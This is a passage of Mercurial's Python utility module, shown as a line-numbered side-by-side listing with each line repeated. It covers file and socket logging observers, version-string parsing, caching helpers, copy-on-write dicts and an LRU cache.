851 # Suppress pointless read(-1) calls that return
851 # Suppress pointless read(-1) calls that return
852 # nothing. These happen _a lot_ on Python 3, and there
852 # nothing. These happen _a lot_ on Python 3, and there
853 # doesn't seem to be a better workaround to have matching
853 # doesn't seem to be a better workaround to have matching
854 # Python 2 and 3 behavior. :(
854 # Python 2 and 3 behavior. :(
855 return
855 return
856
856
857 if self.logdataapis:
857 if self.logdataapis:
858 self.fh.write(b'%s> read(%d) -> %d' % (self.name, size, len(res)))
858 self.fh.write(b'%s> read(%d) -> %d' % (self.name, size, len(res)))
859
859
860 self._writedata(res)
860 self._writedata(res)
861
861
862 def readline(self, res, limit=-1):
862 def readline(self, res, limit=-1):
863 if not self.reads:
863 if not self.reads:
864 return
864 return
865
865
866 if self.logdataapis:
866 if self.logdataapis:
867 self.fh.write(b'%s> readline() -> %d' % (self.name, len(res)))
867 self.fh.write(b'%s> readline() -> %d' % (self.name, len(res)))
868
868
869 self._writedata(res)
869 self._writedata(res)
870
870
871 def readinto(self, res, dest):
871 def readinto(self, res, dest):
872 if not self.reads:
872 if not self.reads:
873 return
873 return
874
874
875 if self.logdataapis:
875 if self.logdataapis:
876 self.fh.write(
876 self.fh.write(
877 b'%s> readinto(%d) -> %r' % (self.name, len(dest), res)
877 b'%s> readinto(%d) -> %r' % (self.name, len(dest), res)
878 )
878 )
879
879
880 data = dest[0:res] if res is not None else b''
880 data = dest[0:res] if res is not None else b''
881
881
882 # _writedata() uses "in" operator and is confused by memoryview because
882 # _writedata() uses "in" operator and is confused by memoryview because
883 # characters are ints on Python 3.
883 # characters are ints on Python 3.
884 if isinstance(data, memoryview):
884 if isinstance(data, memoryview):
885 data = data.tobytes()
885 data = data.tobytes()
886
886
887 self._writedata(data)
887 self._writedata(data)
888
888
889 def write(self, res, data):
889 def write(self, res, data):
890 if not self.writes:
890 if not self.writes:
891 return
891 return
892
892
893 # Python 2 returns None from some write() calls. Python 3 (reasonably)
893 # Python 2 returns None from some write() calls. Python 3 (reasonably)
894 # returns the integer bytes written.
894 # returns the integer bytes written.
895 if res is None and data:
895 if res is None and data:
896 res = len(data)
896 res = len(data)
897
897
898 if self.logdataapis:
898 if self.logdataapis:
899 self.fh.write(b'%s> write(%d) -> %r' % (self.name, len(data), res))
899 self.fh.write(b'%s> write(%d) -> %r' % (self.name, len(data), res))
900
900
901 self._writedata(data)
901 self._writedata(data)
902
902
903 def flush(self, res):
903 def flush(self, res):
904 if not self.writes:
904 if not self.writes:
905 return
905 return
906
906
907 self.fh.write(b'%s> flush() -> %r\n' % (self.name, res))
907 self.fh.write(b'%s> flush() -> %r\n' % (self.name, res))
908
908
909 # For observedbufferedinputpipe.
909 # For observedbufferedinputpipe.
910 def bufferedread(self, res, size):
910 def bufferedread(self, res, size):
911 if not self.reads:
911 if not self.reads:
912 return
912 return
913
913
914 if self.logdataapis:
914 if self.logdataapis:
915 self.fh.write(
915 self.fh.write(
916 b'%s> bufferedread(%d) -> %d' % (self.name, size, len(res))
916 b'%s> bufferedread(%d) -> %d' % (self.name, size, len(res))
917 )
917 )
918
918
919 self._writedata(res)
919 self._writedata(res)
920
920
921 def bufferedreadline(self, res):
921 def bufferedreadline(self, res):
922 if not self.reads:
922 if not self.reads:
923 return
923 return
924
924
925 if self.logdataapis:
925 if self.logdataapis:
926 self.fh.write(
926 self.fh.write(
927 b'%s> bufferedreadline() -> %d' % (self.name, len(res))
927 b'%s> bufferedreadline() -> %d' % (self.name, len(res))
928 )
928 )
929
929
930 self._writedata(res)
930 self._writedata(res)
931
931
932
932
933 def makeloggingfileobject(
933 def makeloggingfileobject(
934 logh, fh, name, reads=True, writes=True, logdata=False, logdataapis=True
934 logh, fh, name, reads=True, writes=True, logdata=False, logdataapis=True
935 ):
935 ):
936 """Turn a file object into a logging file object."""
936 """Turn a file object into a logging file object."""
937
937
938 observer = fileobjectobserver(
938 observer = fileobjectobserver(
939 logh,
939 logh,
940 name,
940 name,
941 reads=reads,
941 reads=reads,
942 writes=writes,
942 writes=writes,
943 logdata=logdata,
943 logdata=logdata,
944 logdataapis=logdataapis,
944 logdataapis=logdataapis,
945 )
945 )
946 return fileobjectproxy(fh, observer)
946 return fileobjectproxy(fh, observer)
947
947
948
948
949 class socketobserver(baseproxyobserver):
949 class socketobserver(baseproxyobserver):
950 """Logs socket activity."""
950 """Logs socket activity."""
951
951
952 def __init__(
952 def __init__(
953 self,
953 self,
954 fh,
954 fh,
955 name,
955 name,
956 reads=True,
956 reads=True,
957 writes=True,
957 writes=True,
958 states=True,
958 states=True,
959 logdata=False,
959 logdata=False,
960 logdataapis=True,
960 logdataapis=True,
961 ):
961 ):
962 super(socketobserver, self).__init__(fh, name, logdata, logdataapis)
962 super(socketobserver, self).__init__(fh, name, logdata, logdataapis)
963 self.reads = reads
963 self.reads = reads
964 self.writes = writes
964 self.writes = writes
965 self.states = states
965 self.states = states
966
966
967 def makefile(self, res, mode=None, bufsize=None):
967 def makefile(self, res, mode=None, bufsize=None):
968 if not self.states:
968 if not self.states:
969 return
969 return
970
970
971 self.fh.write(b'%s> makefile(%r, %r)\n' % (self.name, mode, bufsize))
971 self.fh.write(b'%s> makefile(%r, %r)\n' % (self.name, mode, bufsize))
972
972
973 def recv(self, res, size, flags=0):
973 def recv(self, res, size, flags=0):
974 if not self.reads:
974 if not self.reads:
975 return
975 return
976
976
977 if self.logdataapis:
977 if self.logdataapis:
978 self.fh.write(
978 self.fh.write(
979 b'%s> recv(%d, %d) -> %d' % (self.name, size, flags, len(res))
979 b'%s> recv(%d, %d) -> %d' % (self.name, size, flags, len(res))
980 )
980 )
981 self._writedata(res)
981 self._writedata(res)
982
982
983 def recvfrom(self, res, size, flags=0):
983 def recvfrom(self, res, size, flags=0):
984 if not self.reads:
984 if not self.reads:
985 return
985 return
986
986
987 if self.logdataapis:
987 if self.logdataapis:
988 self.fh.write(
988 self.fh.write(
989 b'%s> recvfrom(%d, %d) -> %d'
989 b'%s> recvfrom(%d, %d) -> %d'
990 % (self.name, size, flags, len(res[0]))
990 % (self.name, size, flags, len(res[0]))
991 )
991 )
992
992
993 self._writedata(res[0])
993 self._writedata(res[0])
994
994
995 def recvfrom_into(self, res, buf, size, flags=0):
995 def recvfrom_into(self, res, buf, size, flags=0):
996 if not self.reads:
996 if not self.reads:
997 return
997 return
998
998
999 if self.logdataapis:
999 if self.logdataapis:
1000 self.fh.write(
1000 self.fh.write(
1001 b'%s> recvfrom_into(%d, %d) -> %d'
1001 b'%s> recvfrom_into(%d, %d) -> %d'
1002 % (self.name, size, flags, res[0])
1002 % (self.name, size, flags, res[0])
1003 )
1003 )
1004
1004
1005 self._writedata(buf[0 : res[0]])
1005 self._writedata(buf[0 : res[0]])
1006
1006
1007 def recv_into(self, res, buf, size=0, flags=0):
1007 def recv_into(self, res, buf, size=0, flags=0):
1008 if not self.reads:
1008 if not self.reads:
1009 return
1009 return
1010
1010
1011 if self.logdataapis:
1011 if self.logdataapis:
1012 self.fh.write(
1012 self.fh.write(
1013 b'%s> recv_into(%d, %d) -> %d' % (self.name, size, flags, res)
1013 b'%s> recv_into(%d, %d) -> %d' % (self.name, size, flags, res)
1014 )
1014 )
1015
1015
1016 self._writedata(buf[0:res])
1016 self._writedata(buf[0:res])
1017
1017
1018 def send(self, res, data, flags=0):
1018 def send(self, res, data, flags=0):
1019 if not self.writes:
1019 if not self.writes:
1020 return
1020 return
1021
1021
1022 self.fh.write(
1022 self.fh.write(
1023 b'%s> send(%d, %d) -> %d' % (self.name, len(data), flags, len(res))
1023 b'%s> send(%d, %d) -> %d' % (self.name, len(data), flags, len(res))
1024 )
1024 )
1025 self._writedata(data)
1025 self._writedata(data)
1026
1026
1027 def sendall(self, res, data, flags=0):
1027 def sendall(self, res, data, flags=0):
1028 if not self.writes:
1028 if not self.writes:
1029 return
1029 return
1030
1030
1031 if self.logdataapis:
1031 if self.logdataapis:
1032 # Returns None on success. So don't bother reporting return value.
1032 # Returns None on success. So don't bother reporting return value.
1033 self.fh.write(
1033 self.fh.write(
1034 b'%s> sendall(%d, %d)' % (self.name, len(data), flags)
1034 b'%s> sendall(%d, %d)' % (self.name, len(data), flags)
1035 )
1035 )
1036
1036
1037 self._writedata(data)
1037 self._writedata(data)
1038
1038
1039 def sendto(self, res, data, flagsoraddress, address=None):
1039 def sendto(self, res, data, flagsoraddress, address=None):
1040 if not self.writes:
1040 if not self.writes:
1041 return
1041 return
1042
1042
1043 if address:
1043 if address:
1044 flags = flagsoraddress
1044 flags = flagsoraddress
1045 else:
1045 else:
1046 flags = 0
1046 flags = 0
1047
1047
1048 if self.logdataapis:
1048 if self.logdataapis:
1049 self.fh.write(
1049 self.fh.write(
1050 b'%s> sendto(%d, %d, %r) -> %d'
1050 b'%s> sendto(%d, %d, %r) -> %d'
1051 % (self.name, len(data), flags, address, res)
1051 % (self.name, len(data), flags, address, res)
1052 )
1052 )
1053
1053
1054 self._writedata(data)
1054 self._writedata(data)
1055
1055
1056 def setblocking(self, res, flag):
1056 def setblocking(self, res, flag):
1057 if not self.states:
1057 if not self.states:
1058 return
1058 return
1059
1059
1060 self.fh.write(b'%s> setblocking(%r)\n' % (self.name, flag))
1060 self.fh.write(b'%s> setblocking(%r)\n' % (self.name, flag))
1061
1061
1062 def settimeout(self, res, value):
1062 def settimeout(self, res, value):
1063 if not self.states:
1063 if not self.states:
1064 return
1064 return
1065
1065
1066 self.fh.write(b'%s> settimeout(%r)\n' % (self.name, value))
1066 self.fh.write(b'%s> settimeout(%r)\n' % (self.name, value))
1067
1067
1068 def gettimeout(self, res):
1068 def gettimeout(self, res):
1069 if not self.states:
1069 if not self.states:
1070 return
1070 return
1071
1071
1072 self.fh.write(b'%s> gettimeout() -> %f\n' % (self.name, res))
1072 self.fh.write(b'%s> gettimeout() -> %f\n' % (self.name, res))
1073
1073
1074 def setsockopt(self, res, level, optname, value):
1074 def setsockopt(self, res, level, optname, value):
1075 if not self.states:
1075 if not self.states:
1076 return
1076 return
1077
1077
1078 self.fh.write(
1078 self.fh.write(
1079 b'%s> setsockopt(%r, %r, %r) -> %r\n'
1079 b'%s> setsockopt(%r, %r, %r) -> %r\n'
1080 % (self.name, level, optname, value, res)
1080 % (self.name, level, optname, value, res)
1081 )
1081 )
1082
1082
1083
1083
1084 def makeloggingsocket(
1084 def makeloggingsocket(
1085 logh,
1085 logh,
1086 fh,
1086 fh,
1087 name,
1087 name,
1088 reads=True,
1088 reads=True,
1089 writes=True,
1089 writes=True,
1090 states=True,
1090 states=True,
1091 logdata=False,
1091 logdata=False,
1092 logdataapis=True,
1092 logdataapis=True,
1093 ):
1093 ):
1094 """Turn a socket into a logging socket."""
1094 """Turn a socket into a logging socket."""
1095
1095
1096 observer = socketobserver(
1096 observer = socketobserver(
1097 logh,
1097 logh,
1098 name,
1098 name,
1099 reads=reads,
1099 reads=reads,
1100 writes=writes,
1100 writes=writes,
1101 states=states,
1101 states=states,
1102 logdata=logdata,
1102 logdata=logdata,
1103 logdataapis=logdataapis,
1103 logdataapis=logdataapis,
1104 )
1104 )
1105 return socketproxy(fh, observer)
1105 return socketproxy(fh, observer)
1106
1106
1107
1107
1108 def version():
1108 def version():
1109 """Return version information if available."""
1109 """Return version information if available."""
1110 try:
1110 try:
1111 from . import __version__
1111 from . import __version__
1112
1112
1113 return __version__.version
1113 return __version__.version
1114 except ImportError:
1114 except ImportError:
1115 return b'unknown'
1115 return b'unknown'
1116
1116
1117
1117
1118 def versiontuple(v=None, n=4):
1118 def versiontuple(v=None, n=4):
1119 """Parses a Mercurial version string into an N-tuple.
1119 """Parses a Mercurial version string into an N-tuple.
1120
1120
1121 The version string to be parsed is specified with the ``v`` argument.
1121 The version string to be parsed is specified with the ``v`` argument.
1122 If it isn't defined, the current Mercurial version string will be parsed.
1122 If it isn't defined, the current Mercurial version string will be parsed.
1123
1123
1124 ``n`` can be 2, 3, or 4. Here is how some version strings map to
1124 ``n`` can be 2, 3, or 4. Here is how some version strings map to
1125 returned values:
1125 returned values:
1126
1126
1127 >>> v = b'3.6.1+190-df9b73d2d444'
1127 >>> v = b'3.6.1+190-df9b73d2d444'
1128 >>> versiontuple(v, 2)
1128 >>> versiontuple(v, 2)
1129 (3, 6)
1129 (3, 6)
1130 >>> versiontuple(v, 3)
1130 >>> versiontuple(v, 3)
1131 (3, 6, 1)
1131 (3, 6, 1)
1132 >>> versiontuple(v, 4)
1132 >>> versiontuple(v, 4)
1133 (3, 6, 1, '190-df9b73d2d444')
1133 (3, 6, 1, '190-df9b73d2d444')
1134
1134
1135 >>> versiontuple(b'3.6.1+190-df9b73d2d444+20151118')
1135 >>> versiontuple(b'3.6.1+190-df9b73d2d444+20151118')
1136 (3, 6, 1, '190-df9b73d2d444+20151118')
1136 (3, 6, 1, '190-df9b73d2d444+20151118')
1137
1137
1138 >>> v = b'3.6'
1138 >>> v = b'3.6'
1139 >>> versiontuple(v, 2)
1139 >>> versiontuple(v, 2)
1140 (3, 6)
1140 (3, 6)
1141 >>> versiontuple(v, 3)
1141 >>> versiontuple(v, 3)
1142 (3, 6, None)
1142 (3, 6, None)
1143 >>> versiontuple(v, 4)
1143 >>> versiontuple(v, 4)
1144 (3, 6, None, None)
1144 (3, 6, None, None)
1145
1145
1146 >>> v = b'3.9-rc'
1146 >>> v = b'3.9-rc'
1147 >>> versiontuple(v, 2)
1147 >>> versiontuple(v, 2)
1148 (3, 9)
1148 (3, 9)
1149 >>> versiontuple(v, 3)
1149 >>> versiontuple(v, 3)
1150 (3, 9, None)
1150 (3, 9, None)
1151 >>> versiontuple(v, 4)
1151 >>> versiontuple(v, 4)
1152 (3, 9, None, 'rc')
1152 (3, 9, None, 'rc')
1153
1153
1154 >>> v = b'3.9-rc+2-02a8fea4289b'
1154 >>> v = b'3.9-rc+2-02a8fea4289b'
1155 >>> versiontuple(v, 2)
1155 >>> versiontuple(v, 2)
1156 (3, 9)
1156 (3, 9)
1157 >>> versiontuple(v, 3)
1157 >>> versiontuple(v, 3)
1158 (3, 9, None)
1158 (3, 9, None)
1159 >>> versiontuple(v, 4)
1159 >>> versiontuple(v, 4)
1160 (3, 9, None, 'rc+2-02a8fea4289b')
1160 (3, 9, None, 'rc+2-02a8fea4289b')
1161
1161
1162 >>> versiontuple(b'4.6rc0')
1162 >>> versiontuple(b'4.6rc0')
1163 (4, 6, None, 'rc0')
1163 (4, 6, None, 'rc0')
1164 >>> versiontuple(b'4.6rc0+12-425d55e54f98')
1164 >>> versiontuple(b'4.6rc0+12-425d55e54f98')
1165 (4, 6, None, 'rc0+12-425d55e54f98')
1165 (4, 6, None, 'rc0+12-425d55e54f98')
1166 >>> versiontuple(b'.1.2.3')
1166 >>> versiontuple(b'.1.2.3')
1167 (None, None, None, '.1.2.3')
1167 (None, None, None, '.1.2.3')
1168 >>> versiontuple(b'12.34..5')
1168 >>> versiontuple(b'12.34..5')
1169 (12, 34, None, '..5')
1169 (12, 34, None, '..5')
1170 >>> versiontuple(b'1.2.3.4.5.6')
1170 >>> versiontuple(b'1.2.3.4.5.6')
1171 (1, 2, 3, '.4.5.6')
1171 (1, 2, 3, '.4.5.6')
1172 """
1172 """
1173 if not v:
1173 if not v:
1174 v = version()
1174 v = version()
1175 m = remod.match(br'(\d+(?:\.\d+){,2})[+-]?(.*)', v)
1175 m = remod.match(br'(\d+(?:\.\d+){,2})[+-]?(.*)', v)
1176 if not m:
1176 if not m:
1177 vparts, extra = b'', v
1177 vparts, extra = b'', v
1178 elif m.group(2):
1178 elif m.group(2):
1179 vparts, extra = m.groups()
1179 vparts, extra = m.groups()
1180 else:
1180 else:
1181 vparts, extra = m.group(1), None
1181 vparts, extra = m.group(1), None
1182
1182
1183 assert vparts is not None # help pytype
1183 assert vparts is not None # help pytype
1184
1184
1185 vints = []
1185 vints = []
1186 for i in vparts.split(b'.'):
1186 for i in vparts.split(b'.'):
1187 try:
1187 try:
1188 vints.append(int(i))
1188 vints.append(int(i))
1189 except ValueError:
1189 except ValueError:
1190 break
1190 break
1191 # (3, 6) -> (3, 6, None)
1191 # (3, 6) -> (3, 6, None)
1192 while len(vints) < 3:
1192 while len(vints) < 3:
1193 vints.append(None)
1193 vints.append(None)
1194
1194
1195 if n == 2:
1195 if n == 2:
1196 return (vints[0], vints[1])
1196 return (vints[0], vints[1])
1197 if n == 3:
1197 if n == 3:
1198 return (vints[0], vints[1], vints[2])
1198 return (vints[0], vints[1], vints[2])
1199 if n == 4:
1199 if n == 4:
1200 return (vints[0], vints[1], vints[2], extra)
1200 return (vints[0], vints[1], vints[2], extra)
1201
1201
1202
1202
1203 def cachefunc(func):
1203 def cachefunc(func):
1204 '''cache the result of function calls'''
1204 '''cache the result of function calls'''
1205 # XXX doesn't handle keywords args
1205 # XXX doesn't handle keywords args
1206 if func.__code__.co_argcount == 0:
1206 if func.__code__.co_argcount == 0:
1207 listcache = []
1207 listcache = []
1208
1208
1209 def f():
1209 def f():
1210 if len(listcache) == 0:
1210 if len(listcache) == 0:
1211 listcache.append(func())
1211 listcache.append(func())
1212 return listcache[0]
1212 return listcache[0]
1213
1213
1214 return f
1214 return f
1215 cache = {}
1215 cache = {}
1216 if func.__code__.co_argcount == 1:
1216 if func.__code__.co_argcount == 1:
1217 # we gain a small amount of time because
1217 # we gain a small amount of time because
1218 # we don't need to pack/unpack the list
1218 # we don't need to pack/unpack the list
1219 def f(arg):
1219 def f(arg):
1220 if arg not in cache:
1220 if arg not in cache:
1221 cache[arg] = func(arg)
1221 cache[arg] = func(arg)
1222 return cache[arg]
1222 return cache[arg]
1223
1223
1224 else:
1224 else:
1225
1225
1226 def f(*args):
1226 def f(*args):
1227 if args not in cache:
1227 if args not in cache:
1228 cache[args] = func(*args)
1228 cache[args] = func(*args)
1229 return cache[args]
1229 return cache[args]
1230
1230
1231 return f
1231 return f
1232
1232
1233
1233
1234 class cow(object):
1234 class cow(object):
1235 """helper class to make copy-on-write easier
1235 """helper class to make copy-on-write easier
1236
1236
1237 Call preparewrite before doing any writes.
1237 Call preparewrite before doing any writes.
1238 """
1238 """
1239
1239
1240 def preparewrite(self):
1240 def preparewrite(self):
1241 """call this before writes, return self or a copied new object"""
1241 """call this before writes, return self or a copied new object"""
1242 if getattr(self, '_copied', 0):
1242 if getattr(self, '_copied', 0):
1243 self._copied -= 1
1243 self._copied -= 1
1244 return self.__class__(self)
1244 return self.__class__(self)
1245 return self
1245 return self
1246
1246
1247 def copy(self):
1247 def copy(self):
1248 """always do a cheap copy"""
1248 """always do a cheap copy"""
1249 self._copied = getattr(self, '_copied', 0) + 1
1249 self._copied = getattr(self, '_copied', 0) + 1
1250 return self
1250 return self
1251
1251
1252
1252
1253 class sortdict(collections.OrderedDict):
1253 class sortdict(collections.OrderedDict):
1254 '''a simple sorted dictionary
1254 '''a simple sorted dictionary
1255
1255
1256 >>> d1 = sortdict([(b'a', 0), (b'b', 1)])
1256 >>> d1 = sortdict([(b'a', 0), (b'b', 1)])
1257 >>> d2 = d1.copy()
1257 >>> d2 = d1.copy()
1258 >>> d2
1258 >>> d2
1259 sortdict([('a', 0), ('b', 1)])
1259 sortdict([('a', 0), ('b', 1)])
1260 >>> d2.update([(b'a', 2)])
1260 >>> d2.update([(b'a', 2)])
1261 >>> list(d2.keys()) # should still be in last-set order
1261 >>> list(d2.keys()) # should still be in last-set order
1262 ['b', 'a']
1262 ['b', 'a']
1263 >>> d1.insert(1, b'a.5', 0.5)
1263 >>> d1.insert(1, b'a.5', 0.5)
1264 >>> d1
1264 >>> d1
1265 sortdict([('a', 0), ('a.5', 0.5), ('b', 1)])
1265 sortdict([('a', 0), ('a.5', 0.5), ('b', 1)])
1266 '''
1266 '''
1267
1267
1268 def __setitem__(self, key, value):
1268 def __setitem__(self, key, value):
1269 if key in self:
1269 if key in self:
1270 del self[key]
1270 del self[key]
1271 super(sortdict, self).__setitem__(key, value)
1271 super(sortdict, self).__setitem__(key, value)
1272
1272
1273 if pycompat.ispypy:
1273 if pycompat.ispypy:
1274 # __setitem__() isn't called as of PyPy 5.8.0
1274 # __setitem__() isn't called as of PyPy 5.8.0
1275 def update(self, src):
1275 def update(self, src):
1276 if isinstance(src, dict):
1276 if isinstance(src, dict):
1277 src = pycompat.iteritems(src)
1277 src = pycompat.iteritems(src)
1278 for k, v in src:
1278 for k, v in src:
1279 self[k] = v
1279 self[k] = v
1280
1280
1281 def insert(self, position, key, value):
1281 def insert(self, position, key, value):
1282 for (i, (k, v)) in enumerate(list(self.items())):
1282 for (i, (k, v)) in enumerate(list(self.items())):
1283 if i == position:
1283 if i == position:
1284 self[key] = value
1284 self[key] = value
1285 if i >= position:
1285 if i >= position:
1286 del self[k]
1286 del self[k]
1287 self[k] = v
1287 self[k] = v
1288
1288
1289
1289
1290 class cowdict(cow, dict):
1290 class cowdict(cow, dict):
1291 """copy-on-write dict
1291 """copy-on-write dict
1292
1292
1293 Be sure to call d = d.preparewrite() before writing to d.
1293 Be sure to call d = d.preparewrite() before writing to d.
1294
1294
1295 >>> a = cowdict()
1295 >>> a = cowdict()
1296 >>> a is a.preparewrite()
1296 >>> a is a.preparewrite()
1297 True
1297 True
1298 >>> b = a.copy()
1298 >>> b = a.copy()
1299 >>> b is a
1299 >>> b is a
1300 True
1300 True
1301 >>> c = b.copy()
1301 >>> c = b.copy()
1302 >>> c is a
1302 >>> c is a
1303 True
1303 True
1304 >>> a = a.preparewrite()
1304 >>> a = a.preparewrite()
1305 >>> b is a
1305 >>> b is a
1306 False
1306 False
1307 >>> a is a.preparewrite()
1307 >>> a is a.preparewrite()
1308 True
1308 True
1309 >>> c = c.preparewrite()
1309 >>> c = c.preparewrite()
1310 >>> b is c
1310 >>> b is c
1311 False
1311 False
1312 >>> b is b.preparewrite()
1312 >>> b is b.preparewrite()
1313 True
1313 True
1314 """
1314 """
1315
1315
1316
1316
1317 class cowsortdict(cow, sortdict):
1317 class cowsortdict(cow, sortdict):
1318 """copy-on-write sortdict
1318 """copy-on-write sortdict
1319
1319
1320 Be sure to call d = d.preparewrite() before writing to d.
1320 Be sure to call d = d.preparewrite() before writing to d.
1321 """
1321 """
1322
1322
1323
1323
1324 class transactional(object): # pytype: disable=ignored-metaclass
1324 class transactional(object): # pytype: disable=ignored-metaclass
1325 """Base class for making a transactional type into a context manager."""
1325 """Base class for making a transactional type into a context manager."""
1326
1326
1327 __metaclass__ = abc.ABCMeta
1327 __metaclass__ = abc.ABCMeta
1328
1328
1329 @abc.abstractmethod
1329 @abc.abstractmethod
1330 def close(self):
1330 def close(self):
1331 """Successfully closes the transaction."""
1331 """Successfully closes the transaction."""
1332
1332
1333 @abc.abstractmethod
1333 @abc.abstractmethod
1334 def release(self):
1334 def release(self):
1335 """Marks the end of the transaction.
1335 """Marks the end of the transaction.
1336
1336
1337 If the transaction has not been closed, it will be aborted.
1337 If the transaction has not been closed, it will be aborted.
1338 """
1338 """
1339
1339
1340 def __enter__(self):
1340 def __enter__(self):
1341 return self
1341 return self
1342
1342
1343 def __exit__(self, exc_type, exc_val, exc_tb):
1343 def __exit__(self, exc_type, exc_val, exc_tb):
1344 try:
1344 try:
1345 if exc_type is None:
1345 if exc_type is None:
1346 self.close()
1346 self.close()
1347 finally:
1347 finally:
1348 self.release()
1348 self.release()
1349
1349
1350
1350
1351 @contextlib.contextmanager
1351 @contextlib.contextmanager
1352 def acceptintervention(tr=None):
1352 def acceptintervention(tr=None):
1353 """A context manager that closes the transaction on InterventionRequired
1353 """A context manager that closes the transaction on InterventionRequired
1354
1354
1355 If no transaction was provided, this simply runs the body and returns
1355 If no transaction was provided, this simply runs the body and returns
1356 """
1356 """
1357 if not tr:
1357 if not tr:
1358 yield
1358 yield
1359 return
1359 return
1360 try:
1360 try:
1361 yield
1361 yield
1362 tr.close()
1362 tr.close()
1363 except error.InterventionRequired:
1363 except error.InterventionRequired:
1364 tr.close()
1364 tr.close()
1365 raise
1365 raise
1366 finally:
1366 finally:
1367 tr.release()
1367 tr.release()
1368
1368
1369
1369
1370 @contextlib.contextmanager
1370 @contextlib.contextmanager
1371 def nullcontextmanager():
1371 def nullcontextmanager():
1372 yield
1372 yield
1373
1373
1374
1374
1375 class _lrucachenode(object):
1375 class _lrucachenode(object):
1376 """A node in a doubly linked list.
1376 """A node in a doubly linked list.
1377
1377
1378 Holds a reference to nodes on either side as well as a key-value
1378 Holds a reference to nodes on either side as well as a key-value
1379 pair for the dictionary entry.
1379 pair for the dictionary entry.
1380 """
1380 """
1381
1381
1382 __slots__ = ('next', 'prev', 'key', 'value', 'cost')
1382 __slots__ = ('next', 'prev', 'key', 'value', 'cost')
1383
1383
1384 def __init__(self):
1384 def __init__(self):
1385 self.next = None
1385 self.next = None
1386 self.prev = None
1386 self.prev = None
1387
1387
1388 self.key = _notset
1388 self.key = _notset
1389 self.value = None
1389 self.value = None
1390 self.cost = 0
1390 self.cost = 0
1391
1391
1392 def markempty(self):
1392 def markempty(self):
1393 """Mark the node as emptied."""
1393 """Mark the node as emptied."""
1394 self.key = _notset
1394 self.key = _notset
1395 self.value = None
1395 self.value = None
1396 self.cost = 0
1396 self.cost = 0
1397
1397
1398
1398
1399 class lrucachedict(object):
1399 class lrucachedict(object):
1400 """Dict that caches most recent accesses and sets.
1400 """Dict that caches most recent accesses and sets.
1401
1401
1402 The dict consists of an actual backing dict - indexed by original
1402 The dict consists of an actual backing dict - indexed by original
1403 key - and a doubly linked circular list defining the order of entries in
1403 key - and a doubly linked circular list defining the order of entries in
1404 the cache.
1404 the cache.
1405
1405
1406 The head node is the newest entry in the cache. If the cache is full,
1406 The head node is the newest entry in the cache. If the cache is full,
1407 we recycle head.prev and make it the new head. Cache accesses result in
1407 we recycle head.prev and make it the new head. Cache accesses result in
1408 the node being moved to before the existing head and being marked as the
1408 the node being moved to before the existing head and being marked as the
1409 new head node.
1409 new head node.
1410
1410
1411 Items in the cache can be inserted with an optional "cost" value. This is
1411 Items in the cache can be inserted with an optional "cost" value. This is
1412 simply an integer that is specified by the caller. The cache can be queried
1412 simply an integer that is specified by the caller. The cache can be queried
1413 for the total cost of all items presently in the cache.
1413 for the total cost of all items presently in the cache.
1414
1414
1415 The cache can also define a maximum cost. If a cache insertion would
1415 The cache can also define a maximum cost. If a cache insertion would
1416 cause the total cost of the cache to go beyond the maximum cost limit,
1416 cause the total cost of the cache to go beyond the maximum cost limit,
1417 nodes will be evicted to make room for the new code. This can be used
1417 nodes will be evicted to make room for the new code. This can be used
1418 to e.g. set a max memory limit and associate an estimated bytes size
1418 to e.g. set a max memory limit and associate an estimated bytes size
1419 cost to each item in the cache. By default, no maximum cost is enforced.
1419 cost to each item in the cache. By default, no maximum cost is enforced.
1420 """
1420 """
1421
1421
1422 def __init__(self, max, maxcost=0):
1422 def __init__(self, max, maxcost=0):
1423 self._cache = {}
1423 self._cache = {}
1424
1424
1425 self._head = head = _lrucachenode()
1425 self._head = head = _lrucachenode()
1426 head.prev = head
1426 head.prev = head
1427 head.next = head
1427 head.next = head
1428 self._size = 1
1428 self._size = 1
1429 self.capacity = max
1429 self.capacity = max
1430 self.totalcost = 0
1430 self.totalcost = 0
1431 self.maxcost = maxcost
1431 self.maxcost = maxcost
1432
1432
1433 def __len__(self):
1433 def __len__(self):
1434 return len(self._cache)
1434 return len(self._cache)
1435
1435
1436 def __contains__(self, k):
1436 def __contains__(self, k):
1437 return k in self._cache
1437 return k in self._cache
1438
1438
1439 def __iter__(self):
1439 def __iter__(self):
1440 # We don't have to iterate in cache order, but why not.
1440 # We don't have to iterate in cache order, but why not.
1441 n = self._head
1441 n = self._head
1442 for i in range(len(self._cache)):
1442 for i in range(len(self._cache)):
1443 yield n.key
1443 yield n.key
1444 n = n.next
1444 n = n.next
1445
1445
1446 def __getitem__(self, k):
1446 def __getitem__(self, k):
1447 node = self._cache[k]
1447 node = self._cache[k]
1448 self._movetohead(node)
1448 self._movetohead(node)
1449 return node.value
1449 return node.value
1450
1450
1451 def insert(self, k, v, cost=0):
1451 def insert(self, k, v, cost=0):
1452 """Insert a new item in the cache with optional cost value."""
1452 """Insert a new item in the cache with optional cost value."""
1453 node = self._cache.get(k)
1453 node = self._cache.get(k)
1454 # Replace existing value and mark as newest.
1454 # Replace existing value and mark as newest.
1455 if node is not None:
1455 if node is not None:
1456 self.totalcost -= node.cost
1456 self.totalcost -= node.cost
1457 node.value = v
1457 node.value = v
1458 node.cost = cost
1458 node.cost = cost
1459 self.totalcost += cost
1459 self.totalcost += cost
1460 self._movetohead(node)
1460 self._movetohead(node)
1461
1461
1462 if self.maxcost:
1462 if self.maxcost:
1463 self._enforcecostlimit()
1463 self._enforcecostlimit()
1464
1464
1465 return
1465 return
1466
1466
1467 if self._size < self.capacity:
1467 if self._size < self.capacity:
1468 node = self._addcapacity()
1468 node = self._addcapacity()
1469 else:
1469 else:
1470 # Grab the last/oldest item.
1470 # Grab the last/oldest item.
1471 node = self._head.prev
1471 node = self._head.prev
1472
1472
1473 # At capacity. Kill the old entry.
1473 # At capacity. Kill the old entry.
1474 if node.key is not _notset:
1474 if node.key is not _notset:
1475 self.totalcost -= node.cost
1475 self.totalcost -= node.cost
1476 del self._cache[node.key]
1476 del self._cache[node.key]
1477
1477
1478 node.key = k
1478 node.key = k
1479 node.value = v
1479 node.value = v
1480 node.cost = cost
1480 node.cost = cost
1481 self.totalcost += cost
1481 self.totalcost += cost
1482 self._cache[k] = node
1482 self._cache[k] = node
1483 # And mark it as newest entry. No need to adjust order since it
1483 # And mark it as newest entry. No need to adjust order since it
1484 # is already self._head.prev.
1484 # is already self._head.prev.
1485 self._head = node
1485 self._head = node
1486
1486
1487 if self.maxcost:
1487 if self.maxcost:
1488 self._enforcecostlimit()
1488 self._enforcecostlimit()
1489
1489
